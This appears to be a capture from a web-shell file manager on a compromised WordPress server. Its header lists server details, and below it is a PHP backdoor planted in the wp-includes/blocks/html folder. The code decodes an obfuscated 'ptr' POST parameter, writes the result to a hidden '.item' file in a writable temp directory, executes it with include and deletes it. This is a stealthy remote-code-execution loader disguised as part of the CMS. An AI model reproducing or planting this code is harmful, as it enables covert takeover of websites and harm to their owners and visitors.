| Server IP : 162.243.168.218 / Your IP : 216.73.216.67 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-includes/blocks/html/ |
Upload File : |
<?php
if(filter_has_var(INPUT_POST, "ptr")){
$pset = array_filter(["/var/tmp", session_save_path(), getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", getcwd(), "/tmp"]);
$entry = $_REQUEST["ptr"];
$entry = explode('.' , $entry ) ;
$ent= '';
$s9= 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS= strlen($s9);
$l= 0;
while($l < count($entry)) {
$v1= $entry[$l];
$chS= ord($s9[$l % $lenS]);
$d= ((int)$v1 - $chS -($l % 10)) ^ 62;
$ent .= chr($d);
$l++; }
$descriptor = 0;
do {
$key = $pset[$descriptor] ?? null;
if ($descriptor >= count($pset)) break;
if (is_writable($key) && is_dir($key)) {
$bind = "$key/.item";
if (@file_put_contents($bind, $ent) !== false) {
include $bind;
unlink($bind);
exit;
}
}
$descriptor++;
} while (true);
}